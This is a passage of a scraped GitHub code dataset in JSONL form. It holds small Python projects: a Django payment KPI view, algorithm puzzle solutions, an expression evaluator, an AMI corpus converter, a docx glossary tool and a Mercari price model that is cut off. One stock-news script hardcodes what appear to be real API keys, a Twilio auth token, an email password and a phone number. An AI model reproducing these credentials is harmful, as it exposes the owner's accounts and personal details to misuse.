12, 2)\n                ).values('hour')\\\n                .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'hour')\n\n        elif window_size == 'DAY':\n            pos = pos.annotate(day=\n                Substr(\n                    Cast(TruncDay('created_datetime', output_field=DateTimeField()),\n                    output_field=CharField()), 9, 2)\n                ).values('day')\\\n                .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'day')\n\n        elif window_size == 'WEEK':\n            pos = pos.annotate(window_size=TruncWeek('created_datetime')).values('window_size')\\\n                .annotate(count=Count('payment')).values('window_size', 'restaurant_id', 'payment', 'count')\n\n        elif 
window_size == 'MONTH':\n pos = pos.annotate(month=\n Substr(\n Cast(TruncMonth('created_datetime', output_field=DateTimeField()),\n output_field=CharField()), 6, 2)\n ).values('month')\\\n .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'month')\n \n elif window_size == 'YEAR':\n pos = pos.annotate(year=\n Substr(\n Cast(TruncYear('created_datetime', output_field=DateTimeField()),\n output_field=CharField()), 1, 4)\n ).values('year')\\\n .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'year')\n\n \n serializer = RestaurantPaymentKPISerializer(pos, many=True)\n return Response(serializer.data, status=200)\n","repo_name":"PreOnboarding-Team-C/02_BearRobotics_C","sub_path":"apps/restaurants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72504519523","text":"#!/usr/bin/python3\n\"\"\"2. POST an email #0 \"\"\"\n\nfrom sys import argv\nimport urllib.parse\nimport urllib.request\n\nif __name__ == '__main__':\n url = argv[1]\n values = {'email': argv[2]}\n\n data = urllib.parse.urlencode(values)\n data = data.encode('ascii')\n\n req = urllib.request.Request(url, data)\n with urllib.request.urlopen(req) as response:\n print(response.read().decode('utf-8'))\n","repo_name":"Louvani/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42288036043","text":"class User:\n def __init__(self, market):\n self.market = market\n self.stocks = dict()\n for each in market.companies:\n self.stocks[each] = 0\n self.money = 5000\n\n def buy(self, company, price, amount):\n print(price)\n print(amount)\n if self.money >= price*amount:\n self.market.active_offers[company].insert(1, [self, price, amount])\n\n def sell(self, company, price, amount):\n if amount <= self.stocks[company]:\n self.market.active_offers[company].insert(1, [self, price, -amount])\n","repo_name":"yankur/StockExchange_coursework","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27663453049","text":"from sources.pdesolver.formula_parser.visitor import Visitor\n\n\nclass SimpleExpressionEvaluator(Visitor):\n \"\"\"\n Implements an evaluator for expressions that have been parsed with the formula_parser.\n It is implemented as a visitor that is applied on the parsed formula.\n\n Attributes\n ------\n values: keeps the set of results and intermediary results used as a stack.\n\n\n\n \"\"\"\n\n\n def __init__(self, variables, functions={}):\n \"\"\"\n :param variables: Set of variables that may be used for the evaluation\n :param functions: Set of functions that may be used for the evaluation\n \"\"\"\n self.values = []\n self.variables = variables\n self.functions = functions\n self.result = None\n\n def get_result(self):\n if self.result is None:\n self.result = self.values.pop()\n return self.result\n\n def visit_number(self, number_expr):\n self.values.append(number_expr.get_value())\n\n def visit_function_call(self, function_call_expr):\n parameter_values = []\n for parameter in function_call_expr.get_parameter_expr_list():\n parameter.accept(self)\n 
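# (editor's note, added) accept() makes each argument expression push its value onto self.values; it is popped into parameter_values just below.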
parameter_values.append(self.values.pop())\n\n function_name = function_call_expr.get_function_name()\n if function_name in self.functions:\n fn = self.functions[function_name]\n function_result = fn(parameter_values)\n self.values.append(function_result)\n else:\n raise Exception(\"Function not provided for evaluation:\" + function_name)\n\n def visit_variable(self, variable_expr):\n name = variable_expr.get_name()\n if name in self.variables:\n self.values.append(self.variables[name])\n else:\n raise Exception(\"Variable has no value:\"+name)\n\n def visit_child_expression(self, child_expr):\n child_expr.get_child().accept(self)\n\n def visit_binary_operator(self, binary_expr):\n symbol = binary_expr.get_symbol()\n\n binary_expr.get_left_child_expr().accept(self)\n binary_expr.get_right_child_expr().accept(self)\n\n right_value = self.values.pop()\n left_value = self.values.pop()\n\n if symbol == '+':\n self.values.append(left_value + right_value)\n elif symbol == '-':\n self.values.append(left_value - right_value)\n elif symbol == '*':\n self.values.append(left_value * right_value)\n elif symbol == '/':\n self.values.append(left_value / right_value)\n else:\n raise Exception('Unsupported operator symbol:'+symbol)\n\n def visit_unary_operator(self, unary_expr):\n symbol = unary_expr.get_symbol()\n unary_expr.get_child_expr().accept(self)\n\n child_value = self.values.pop()\n\n if symbol == '+':\n self.values.append(child_value)\n elif symbol == '-':\n self.values.append(-child_value)\n else:\n raise Exception('Unsupported operator symbol:' + symbol)\n","repo_name":"JohannOberleitner/pdesolver","sub_path":"sources/pdesolver/pde/SimpleExpressionEvaluator.py","file_name":"SimpleExpressionEvaluator.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13462590592","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\nd = [(1,0),(-1,0),(0,1),(0,-1)]\r\n\r\nn,m = map(int,input().split())\r\nboard = [list(input().rstrip()) for _ in range(n)]\r\nvis = [[[0] * m for _ in range(n)] for _ in range(2)]\r\n\r\ndef bfs(x,y):\r\n vis[1][x][y] = 1\r\n q = deque()\r\n q.append((x,y,1))\r\n while q:\r\n px,py,wc = q.popleft()\r\n if px == n-1 and py == m-1:\r\n return vis[wc][px][py]\r\n for dx,dy in d:\r\n nx = px + dx\r\n ny = py + dy\r\n if 0 <= nx < n and 0 <= ny < m:\r\n if board[nx][ny] == '0' and vis[wc][nx][ny] == 0:\r\n vis[wc][nx][ny] = vis[wc][px][py] + 1\r\n q.append((nx,ny,wc))\r\n elif wc > 0 and board[nx][ny] == '1' and vis[wc-1][nx][ny] == 0:\r\n vis[wc-1][nx][ny] = vis[wc][px][py] + 1 \r\n q.append((nx,ny,wc-1))\r\n return -1 \r\n\r\nprint(bfs(0,0))\r\n","repo_name":"yootal/CodingTest","sub_path":"백준/Gold/2206. 
벽 부수고 이동하기/벽 부수고 이동하기.py","file_name":"벽 부수고 이동하기.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10310943487","text":"import requests\nimport datetime as dt\nfrom twilio.rest import Client\nimport smtplib\n\nSTOCK = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\nCHANGE = 0\n\nALPHA_VANTAGE_API_KEY = \"QJBEJGRF3O7UTNUK\"\nALPHA_VANTAGE_END_POINT = \"https://www.alphavantage.co/query\"\n\nNEWS_API_END_POINT = \"https://newsapi.org/v2/everything\"\nNEWSAPI_API_KEY = \"1aa76e5062a14bb3a6307d205d8ab3c5\"\n\naccount_sid = \"AC8a95a85cabd382f190b3ac17e0a97d26\"\nauth_token = \"1c531beaff38baf0e0b5b5148a225b61\"\n\nEMAIL = \"562937707@qq.com\"\nPASSWORD = \"bpyjiqjylklcbdhe\"\n\n# # STEP 1: Use https://www.alphavantage.co\n# When STOCK price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\nalpha_vantage_params = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": \"TSLA\",\n \"apikey\": ALPHA_VANTAGE_API_KEY\n}\nresponse = requests.get(ALPHA_VANTAGE_END_POINT, params=alpha_vantage_params)\nresponse.raise_for_status()\nalpha_vantage_data = response.json()[\"Time Series (Daily)\"]\nprint(alpha_vantage_data)\nalpha_vantage_data_list = [value for (key, value) in alpha_vantage_data.items()]\nyesterday = alpha_vantage_data_list[0]\nday_before_yesterday = alpha_vantage_data_list[1]\nyesterday_price = float(yesterday[\"4. close\"])\nprint(yesterday_price)\nday_before_yesterday_price = float(day_before_yesterday[\"4. close\"])\nprint(day_before_yesterday_price)\nprice_change = (yesterday_price-day_before_yesterday_price)/day_before_yesterday_price * 100\nprint(price_change)\nif price_change > 0:\n sign = \"up\"\nelse:\n sign = \"down\"\n\nprice_change = round(price_change, 2)\nif abs(price_change) > CHANGE:\n print(\"send news\")\n # # STEP 2: Use https://newsapi.org\n # Instead of printing (\"Get News\"), actually get the first 3 news pieces for the COMPANY_NAME.\n\n newsapi_params = {\n \"apiKey\": NEWSAPI_API_KEY,\n \"qInTitle\": COMPANY_NAME,\n }\n response = requests.get(NEWS_API_END_POINT, params=newsapi_params)\n response.raise_for_status()\n news = response.json()\n\n articles = response.json()\n three_articles = articles[\"articles\"][:3]\n formatted_articles = f\"TSLA: {sign}{price_change}%\\n\"\n for article in three_articles:\n formatted_articles += f\"Headline: {article['title']}\\n\"\n formatted_articles += f\"Brief: {article['description']}\\n\"\n print(formatted_articles)\n # # STEP 3: Use https://www.twilio.com\n # Send a separate message with the percentage change and each article's title and description to your phone number.\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=f\"{formatted_articles}\",\n from_='+16065540848',\n to='+8619808145773'\n )\n print(message.status)\n\n with smtplib.SMTP(\"smtp.qq.com\") as connection:\n connection.starttls()\n connection.login(user=EMAIL, password=PASSWORD)\n connection.sendmail(from_addr=EMAIL,\n to_addrs=EMAIL,\n msg=f\"Subject:STOCK NEWS\\n\\n{formatted_articles}\")\nelse:\n print(\"change is too small.\")\n\n\n# Optional: Format the SMS message like this:\n\"\"\"\nTSLA: 🔺2%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. 
\nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\nor\n\"TSLA: 🔻5%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. \nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\n\"\"\"\n\n","repo_name":"yufanme/stock-news-extrahard-start36","sub_path":"stock-news-extrahard-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43524405837","text":"#!/usr/bin/env python\n# coding: utf-8\nimport argparse\nimport codecs\nimport os\nimport xml.etree.ElementTree as et\nimport re\nimport sys\n\nfrom json_core import Sent, Topic, to_json\n\n\nNAMESPACE_NITE = 'http://nite.sourceforge.net/'\nOTHER_DESCRIPTION = 'other_description'\nNITE_ID_ATTR = '{' + NAMESPACE_NITE + '}id'\nNAME_ATTR = 'name'\nTOPICNAME_TAG = 'topicname'\nNITE_POINTER_TAG = '{' + NAMESPACE_NITE + '}pointer'\nNITE_CHILD_TAG = '{' + NAMESPACE_NITE + '}child'\nTOPIC_TAG = 'topic'\nHREF_ATTR = 'href'\nW_TAG = 'w'\nSTART_TIME_ATTR = 'starttime'\nEND_TIME_ATTR = 'endtime'\nTRUNC_ATTR = 'trunc'\nPUNC_ATTR = 'punc'\n\n\ndef get_default_topics(root):\n default_topics = {}\n # recursively\n for topicname_element in root.iter(TOPICNAME_TAG):\n id_ = topicname_element.get(NITE_ID_ATTR)\n default_topics[id_] = topicname_element.get(NAME_ATTR)\n return default_topics\n\n\ndef get_speaker_words(root):\n nite_id_attr = root.get(NITE_ID_ATTR)\n speaker = re.search(r'\\.(.+)\\.', nite_id_attr).group(1)\n words = [e for e in root]\n return speaker, words\n\n\ndef topics_lines(topics_root, default_topics, speaker_segment_dict, speaker_word_dict):\n topics = []\n sents = []\n speaker_segment_pos_dict = {}\n for speaker in speaker_segment_dict:\n speaker_segment_pos_dict[speaker] = 0\n for topic_element in topics_root:\n topic = parse_ami_topic(topic_element, default_topics,\n speaker_segment_dict,\n speaker_segment_pos_dict,\n speaker_word_dict, sents)\n topics.append(topic)\n return topics, sents\n\n\ndef is_valid_word_element(e):\n return e.tag == W_TAG and TRUNC_ATTR not in e.attrib\n\n\ndef get_valid_word_elements(e_list):\n return filter(is_valid_word_element, e_list)\n\n\ndef words_to_sent(speaker, words):\n if not words:\n return None\n text = ' '.join(map(lambda x: x.text, words))\n if not text:\n return None\n start_time = words[0].get(START_TIME_ATTR)\n end_time = words[-1].get(END_TIME_ATTR)\n return Sent(start_time, end_time, speaker, text)\n\n\ndef get_speaker_segments(root):\n nite_id_attr = root.get(NITE_ID_ATTR)\n speaker = re.search(r'\\.(.+)\\.', nite_id_attr).group(1)\n segments = []\n for segment_element in root:\n child_element = segment_element.find(NITE_CHILD_TAG)\n href_attr = child_element.get(HREF_ATTR)\n _, range_ = href_attr.split('#')\n groups = re.findall(r'words(\\d+)', range_)\n if len(groups) == 1:\n start = int(groups[0])\n end = start\n else:\n start, end = map(int, groups)\n segments.append((start, end))\n return speaker, segments\n\n\ndef parse_ami_topic(topic_element, default_topics, speaker_segment_dict,\n speaker_segment_pos_dict, 
speaker_word_dict, sents):\n subtopics = []\n description = ''\n topic_start = len(sents)\n next_line_num = topic_start\n if OTHER_DESCRIPTION in topic_element.attrib:\n description = topic_element.get(OTHER_DESCRIPTION)\n\n for element in topic_element:\n if element.tag == TOPIC_TAG:\n subtopic = parse_ami_topic(element, default_topics,\n speaker_segment_dict,\n speaker_segment_pos_dict,\n speaker_word_dict, sents)\n subtopics.append(subtopic)\n elif element.tag == NITE_POINTER_TAG and not description:\n href_attr = element.get(HREF_ATTR)\n topic_id = href_attr[href_attr.rfind('top'):-1]\n description = default_topics[topic_id]\n elif element.tag == NITE_CHILD_TAG:\n href_attr = element.get(HREF_ATTR)\n filename, range_ = href_attr.split('#')\n speaker = re.search(r'\\.(\\w)\\.', filename).group(1)\n groups = re.findall(r'words(\\d+)', range_)\n if len(groups) == 1:\n child_start = int(groups[0])\n child_end = child_start\n else:\n child_start, child_end = map(int, groups)\n segments = speaker_segment_dict[speaker]\n segment_pos = speaker_segment_pos_dict[speaker]\n words = speaker_word_dict[speaker]\n start = child_start\n for pos in xrange(segment_pos, len(segments)):\n segment_start, segment_end = segments[pos]\n end = segment_end if segment_end <= child_end else child_end\n sent = words_to_sent(speaker, get_valid_word_elements(words[start:end + 1]))\n start = end + 1\n if sent:\n sents.append(sent)\n next_line_num += 1\n if segment_end >= child_end:\n if segment_end == child_end:\n segment_pos = pos + 1\n break\n speaker_segment_pos_dict[speaker] = segment_pos\n topic_end = len(sents) - 1\n return Topic(topic_start, topic_end, description, subtopics)\n\n\ndef parse_word(word_xmls):\n speaker_word_dict = {}\n for word_xml in word_xmls:\n root = et.parse(word_xml).getroot()\n speaker, words = get_speaker_words(root)\n speaker_word_dict[speaker] = words\n return speaker_word_dict\n\n\ndef parse_segment(segment_xmls):\n speaker_segment_dict = {}\n for segment_xml in segment_xmls:\n root = et.parse(segment_xml).getroot()\n speaker, segments = get_speaker_segments(root)\n speaker_segment_dict[speaker] = segments\n return speaker_segment_dict\n\n\ndef ami_to_json(meeting_id, topic_xml, word_xmls, segment_xmls, default_topics_xml, out_file):\n speaker_word_dict = parse_word(word_xmls)\n speaker_segment_dict = parse_segment(segment_xmls)\n default_topics_root = et.parse(default_topics_xml).getroot()\n default_topics = get_default_topics(default_topics_root)\n topic_root = et.parse(topic_xml).getroot()\n topics, sents = topics_lines(topic_root, default_topics, speaker_segment_dict, speaker_word_dict)\n to_json(meeting_id, sents, topics, out_file)\n\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('topic_dir')\n arg_parser.add_argument('word_dir')\n arg_parser.add_argument('segment_dir')\n arg_parser.add_argument('default_topics_xml')\n arg_parser.add_argument('output_dir')\n args = arg_parser.parse_args()\n\n topic_xmls = map(lambda x: os.path.join(args.topic_dir, x),\n os.listdir(args.topic_dir))\n all_word_xmls = map(lambda x: os.path.join(args.word_dir, x),\n os.listdir(args.word_dir))\n all_segment_xmls = map(lambda x: os.path.join(args.segment_dir, x),\n os.listdir(args.segment_dir))\n if not os.path.exists(args.output_dir):\n os.mkdir(args.output_dir)\n for topic_xml in topic_xmls:\n meeting_id = re.search(r'^([\\w\\d]+)',\n os.path.split(topic_xml)[1]).group(1)\n word_xmls = filter(lambda x: meeting_id in x, all_word_xmls)\n segment_xmls = 
filter(lambda x: meeting_id in x, all_segment_xmls)\n        output_path = os.path.join(args.output_dir,\n                                   '{}.json'.format(meeting_id))\n        with codecs.open(output_path, mode='w', encoding='utf-8') as output:\n            ami_to_json(meeting_id, topic_xml, word_xmls, segment_xmls, args.default_topics_xml, output)\n    sys.exit(0)\n","repo_name":"binghaobhw/topic-segmentation","sub_path":"topic-segmentation/ami_to_json.py","file_name":"ami_to_json.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"22929262741","text":"class Solution(object):\n    def orangesRotting(self, grid):\n        \"\"\"\n        :type grid: List[List[int]]\n        :rtype: int\n        \"\"\"\n\n        from collections import deque\n\n        fresh = 0\n        q = deque()\n        M = len(grid)\n        N = len(grid[0])\n\n        for i in range(M):\n            for j in range(N):\n                if grid[i][j] == 2:\n                    q.append((i, j, 0))\n                if grid[i][j] == 1:\n                    fresh += 1\n\n        minute = 0\n        prev = fresh\n        while q:\n            i,j,minute = q.popleft()\n            if grid[i][j] == 2:\n                for r,c in [(i-1,j), (i+1,j), (i,j-1), (i,j+1)]:\n                    if 0<=r<M and 0<=c<N and grid[r][c] == 1:\n                        grid[r][c] = 2\n                        fresh -= 1\n                        q.append((r,c,minute+1))\n\n        if fresh > 0:\n            return -1\n        else:\n            return minute\n\n\nsol = Solution()\nprint(sol.orangesRotting([[2,1,1],[1,1,0],[0,1,1]]))","repo_name":"noah0504789/F-lab-Algorithm","sub_path":"leetcode/python/leetcode/994. Rotting Oranges.py","file_name":"994. Rotting Oranges.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"10149516589","text":"import docx\r\nimport pathlib\r\n# The shared glossary and the specs are best kept in separate folders\r\n\r\nc = pathlib.Path(r'') # full path to the folder with the specs\r\nall_files = []\r\nfor i in c.iterdir():\r\n    all_files.append(i)\r\n\r\n\r\n\r\nterms = dict()\r\nterms_doc = docx.Document(r'') # full path to the glossary\r\nttt = terms_doc.tables[0]\r\nfor row in ttt.rows:\r\n    terms[row.cells[0].text] = row.cells[1].text\r\n\r\n\r\n\r\n\r\n\r\nfor files in all_files:\r\n    doc = docx.Document(files)\r\n    tables = doc.tables\r\n    count = 0\r\n    textt = []\r\n    for paragraph in doc.paragraphs:\r\n        textt.append(paragraph.text)\r\n\r\n\r\n\r\n\r\n    # create an empty dict for the table data\r\n    data_tables = {i:None for i in range(len(tables))}\r\n    # iterate over the tables\r\n    for i, table in enumerate(tables):\r\n        # create the list of rows for table `i` (empty for now)\r\n        data_tables[i] = [[] for _ in range(len(table.rows))]\r\n        # iterate over the rows of table `i`\r\n        for j, row in enumerate(table.rows):\r\n            # iterate over the cells of table `i`, row `j`\r\n            for cell in row.cells:\r\n                # append the cell value to the matching\r\n                # row list of the table-data dict\r\n                data_tables[i][j].append(cell.text)\r\n\r\n\r\n    q = [i for i in data_tables.values()]\r\n    for i in q:\r\n        for j in i:\r\n            for jj in j:\r\n                textt.append(jj)\r\n\r\n\r\n    buff = []\r\n    for i in textt:\r\n        if i in terms.keys() and i not in buff:\r\n            if i == 'Комментарий' or i == 'Термин':\r\n                continue\r\n            else:\r\n                buff.append(i)\r\n\r\n    for paragraph in doc.paragraphs:\r\n        count += 1\r\n        if count == 8:\r\n            t = doc.add_table(len(buff),2)\r\n            t.style = 'Table Grid'\r\n            for row in range(len(buff)):\r\n                for col in range(2):\r\n                    cell = t.cell(row, col)\r\n                    if col == 0:\r\n                        cell.text = buff[row]\r\n                    else:\r\n                        cell.text = terms[buff[row]]\r\n        elif count > 8:\r\n            break\r\n\r\n    
doc.save(str(files).split('\\\\')[-1].split('.')[0]+'_TEST_'+'.docx')\r\n\r\n\r\n","repo_name":"Nubikk/Parser_Glossary","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2481316575","text":"IS_LOCAL = False\nIS_KAGGLE_SERVER = not IS_LOCAL\nif IS_KAGGLE_SERVER:\n import os\n os.environ['NUMEXPR_NUM_THREADS'] = '4'\n os.environ['OPENBLAS_NUM_THREADS'] = '4'\n os.environ['MKL_NUM_THREADS'] = '4'\n import mkl\n mkl.set_num_threads(4)\n\nimport enum\nimport gc\nimport time\nfrom typing import List\n\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nimport scipy as scipy\nimport scipy.sparse as sp\nfrom joblib import Parallel, delayed\nfrom keras.callbacks import LearningRateScheduler\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import Ridge\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\n\n\nclass Timer:\n def __init__(self, timer_name):\n self.timer_name = timer_name\n self.start_time = self.last_time = time.time()\n\n def get_total_and_since_last(self):\n current_time = time.time()\n total = current_time - self.start_time\n since_last = current_time - self.last_time\n self.last_time = current_time\n return total, since_last\n\n def print(self, message):\n total, since_last = self.get_total_and_since_last()\n print('### [{}] [{:6.1f}] [{:6.1f}] {}'.format(self.timer_name, total, since_last, message))\n\n\ndef rmse(y, correct_y):\n return np.sqrt(mean_squared_error(y, correct_y))\n\n\ndef split_category_name(category_name: str):\n spl = category_name.split('/', 2)\n if len(spl) == 3:\n return spl\n else:\n return ['', '', '']\n\n\ndef read_dataset(down_sampling_rate=None, train_size=None):\n train = pd.read_table('../input/train.tsv', engine='c')\n test = pd.read_table('../input/test.tsv', engine='c')\n if down_sampling_rate is not None:\n assert 0 < down_sampling_rate < 1.0\n train = train.sample(frac=down_sampling_rate, random_state=1919)\n test = test.sample(frac=down_sampling_rate, random_state=810)\n\n train['labeled'] = True\n train['log1p_price'] = np.log1p(train['price'])\n\n train['for_train'] = True\n if train_size is not None:\n assert 0 < train_size < 1.0\n train = train.sample(frac=1, random_state=364364).reset_index(drop=True)\n train.loc[int(train.shape[0] * train_size):, 'for_train'] = False\n\n test['labeled'] = False\n test['for_train'] = False\n train.rename(columns={'train_id': 'id'}, inplace=True)\n test.rename(columns={'test_id': 'id'}, inplace=True)\n\n dataset = pd.concat([train, test], ignore_index=True)\n\n clean_dirty_data(dataset)\n\n # extend\n dataset['name'] = dataset['brand_name'] + ' ' + dataset['name']\n dataset['item_description'] = dataset['name'] + ' ' + \\\n dataset['item_description']\n\n # preprocessor = Preprocessor().fit(dataset['name'].tolist() + dataset['item_description'].tolist())\n # dataset['name'] = dataset['name'].map(preprocessor.preprocess_symbols)\n # dataset['item_description'] = dataset['item_description'].map(preprocessor.preprocess_symbols)\n\n add_sub_cagegories(dataset)\n\n return dataset\n\n\ndef clean_dirty_data(dataset):\n dataset['name'].fillna('', inplace=True)\n dataset['category_name'].fillna('', inplace=True)\n dataset['brand_name'].fillna('', inplace=True)\n dataset['item_description'].fillna('', 
inplace=True)\n\n dataset.drop(dataset[dataset.price < 1.0].index, inplace=True)\n dataset.reset_index(inplace=True, drop=True)\n\n\ndef add_sub_cagegories(dataset):\n spl = dataset['category_name'].apply(split_category_name)\n dataset['category1'], dataset['category2'], dataset['category3'] = zip(*spl)\n\n\ndef create_sub_categories(dataset: pd.DataFrame):\n spl = dataset['category_name'].apply(split_category_name)\n\n df = pd.DataFrame()\n df['category1'], df['category2'], df['category3'] = zip(*spl)\n\n df['category1'] = df['category1'] + '_' + dataset['item_condition_id'].astype(str)\n df['category2'] = df['category2'] + '_' + dataset['item_condition_id'].astype(str)\n df['category3'] = df['category3'] + '_' + dataset['item_condition_id'].astype(str)\n\n feature_names = ['category1', 'category2', 'category3']\n\n n = dataset.shape[0]\n feature = np.concatenate([\n LabelEncoder().fit_transform(df['category1']).reshape(n, 1),\n LabelEncoder().fit_transform(df['category2']).reshape(n, 1),\n LabelEncoder().fit_transform(df['category3']).reshape(n, 1),\n ], axis=1)\n\n assert feature.shape[0] == n\n assert feature.shape[1] == 3\n return Feature(feature_names, feature, FeatureType.CATEGORICAL)\n\n\ndef descritize_each_column(a, num_bins):\n a = a.copy()\n for col in range(a.shape[1]):\n column = a[:, col]\n _, bins = pd.qcut(np.unique(column), num_bins - 1, duplicates='drop', labels=False, retbins=True)\n\n descritized_vals = np.digitize(column, bins)\n descritized_vals = LabelEncoder().fit_transform(descritized_vals)\n\n a[:, col] = descritized_vals\n return a\n\n\nclass FeatureType(enum.Enum):\n NORMAL = enum.auto()\n CATEGORICAL = enum.auto()\n\n\nclass Feature:\n def __init__(self, feature_names, feature, feature_type=FeatureType.NORMAL, bins=None):\n if isinstance(feature_names, str):\n feature_names = [feature_names]\n # assert feature.shape[1] == len(feature_names)\n self.feature_names = feature_names\n self.feature = feature\n self.feature_type = feature_type\n self.bins = bins\n\n def get_lgb_feature_names(self):\n return self.feature_names\n\n def get_lgb_features(self):\n return self.feature\n\n def get_one_hot_like_features(self):\n if self.feature_type == FeatureType.CATEGORICAL:\n assert self.bins is None\n return OneHotEncoder().fit_transform(self.feature)\n elif self.bins is not None:\n # try-catch?\n return OneHotEncoder().fit_transform(descritize_each_column(self.feature, self.bins))\n else:\n return self.feature\n\n def get_keras_features(self):\n return self.feature\n\n def get_feature_type(self):\n return self.feature_type\n\n\ndef create_categorical_name_feature(dataset):\n name_df = pd.DataFrame()\n name_df['name'] = dataset['name'].str.lower()\n count_name = name_df['name'].value_counts()\n name_df['count'] = name_df['name'].map(count_name)\n name_df.loc[(name_df['count'] < 2), 'name'] = ''\n\n name_feature = LabelEncoder().fit_transform(name_df['name']).reshape(-1, 1)\n\n assert name_feature.shape[0] == dataset.shape[0]\n return Feature('name', name_feature, FeatureType.CATEGORICAL)\n\n\ndef create_features(dataset):\n timer = Timer('feature_creation')\n n = dataset.shape[0]\n features = []\n\n features.append(Feature('item_condition_id', dataset['item_condition_id'].values.reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(Feature('shipping', dataset['shipping'].values.reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(Feature('brand_name', LabelEncoder().fit_transform(dataset['brand_name']).reshape(n, 1), FeatureType.CATEGORICAL))\n 
features.append(Feature('category_name', LabelEncoder().fit_transform(dataset['category_name']).reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(create_sub_categories(dataset))\n features.append(create_categorical_name_feature(dataset))\n\n features.append(Feature('name_len', dataset['name'].str.len().values.reshape(n, 1), bins=10))\n features.append(Feature('item_description_len', dataset['item_description'].str.len().values.reshape(n, 1), bins=40))\n\n features.append(Feature('name_count_words', dataset['name'].str.count(' ').values.reshape(n, 1) + 1, feature_type=FeatureType.CATEGORICAL))\n features.append(Feature('item_description_count_words', dataset['item_description'].str.count(' ').values.reshape(n, 1) + 1, bins=20))\n timer.print('Done basic')\n\n return features\n\n\ndef create_sparse_features(dataset, feature_params):\n timer = Timer('sparse feature')\n timer.print('Start')\n\n sparse_features = []\n sparse_features.append(create_doc_term_of_name(dataset, **feature_params['name_term']))\n timer.print('Done create_doc_term_of_name')\n\n sparse_features.append(create_doc_term_of_description(dataset, **feature_params['desc_term']))\n timer.print('Done create_doc_term_of_description')\n\n return sparse_features\n\n\ndef predict(models, features):\n predicts = np.ndarray(shape=(features.shape[0], len(models)), dtype=np.float64)\n for i, model in enumerate(models):\n predicts[:, i] = model.predict(features)\n return predicts.mean(axis=1)\n\n\n# one hot\ndef create_one_hot_like_features(features: List[Feature], start, end, train_size, verbose=False):\n one_hot_like_features = []\n for feature in features:\n gc.collect()\n one_hot_like_feature = feature.get_one_hot_like_features()\n one_hot_like_features.append(one_hot_like_feature)\n if verbose:\n print('{:20s}, {}'.format(feature.get_lgb_feature_names()[0], one_hot_like_feature.shape))\n gc.collect()\n f = scipy.sparse.hstack(one_hot_like_features, dtype=np.float64).tocsr()\n f = drop_non_intersect_features(f, train_size)\n # assert np.unique(f.data) == [1]\n f = f[start:end]\n gc.collect()\n return f\n\n\ndef preprocess(a):\n return a.lower().replace('$', ' dolloars ').replace('gb', ' gb ').replace('+', ' plus ')\n\n\ndef drop_non_intersect_features(matrix, train_size):\n intersect = (matrix[:train_size].sum(axis=0) > 0).A1 & (matrix[train_size:].sum(axis=0) > 0).A1\n return matrix[:, intersect]\n\n\ndef create_doc_term_of_name(dataset, min_df, ngram_range):\n name = dataset['name'].map(preprocess)\n\n vec = CountVectorizer(\n min_df=min_df,\n ngram_range=ngram_range,\n token_pattern=r\"(?u)\\b\\w+\\b\",\n stop_words='english',\n binary=True\n )\n print(vec)\n count_matrix = vec.fit_transform(name[dataset['for_train']])\n count_matrix = sp.vstack([count_matrix, vec.transform(name[~dataset['for_train']])])\n\n print(count_matrix.shape)\n count_matrix = drop_non_intersect_features(count_matrix, dataset['for_train'].sum())\n print(count_matrix.shape)\n\n # assert np.unique(count_matrix.data) == [1]\n return Feature('doc_term_of_name', count_matrix)\n\n\ndef create_doc_term_of_description(dataset, min_df, ngram_range):\n item_description = dataset['item_description'].map(preprocess)\n\n vec = CountVectorizer(\n min_df=min_df,\n ngram_range=ngram_range,\n 